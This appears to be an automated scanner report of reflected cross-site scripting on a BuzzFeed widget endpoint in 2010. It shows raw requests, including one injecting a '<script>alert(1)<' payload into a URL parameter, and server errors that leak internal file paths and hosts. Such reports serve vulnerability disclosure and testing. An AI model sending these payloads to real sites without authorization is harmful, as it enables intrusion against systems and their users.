1. Cross-site scripting (reflected)
1.1. http://ct.buzzfeed.com/wd/UserWidget [or parameter]
1.2. http://ct.buzzfeed.com/wd/UserWidget [u parameter]
Severity: | High |
Confidence: | Certain |
Host: | http://ct.buzzfeed.com |
Path: | /wd/UserWidget |
GET /wd/UserWidget?u=popeater Host: ct.buzzfeed.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 500 Internal Server Error Content-Type: text/html; charset=ISO-8859-1 Date: Fri, 19 Nov 2010 23:12:25 GMT Server: lighttpd bf1 Content-Length: 577 Connection: close bless({ "-file" => "lib/buzzfeed/wd "-line" => 120, "-package" => "buzzfeed::wd::controller "-text" => "unable to fetch user widget: http://terminal3.buzzfeed }, "Error::Simple") unable to fetch user widget: http://terminal3.buzzfeed ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ct.buzzfeed.com |
Path: | /wd/UserWidget |
GET /wd/UserWidget?u=popeatera8a5c<script>alert(1)< Host: ct.buzzfeed.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 500 Internal Server Error Content-Type: text/html; charset=ISO-8859-1 Date: Fri, 19 Nov 2010 23:12:25 GMT Server: lighttpd bf2 Content-Length: 577 Connection: close bless({ "-file" => "lib/buzzfeed/wd "-line" => 120, "-package" => "buzzfeed::wd::controller "-text" => "unable to fetch user widget: http://terminal3.buzzfeed }, "Error::Simple") unable to fetch user widget: http://terminal3.buzzfeed ...[SNIP]... |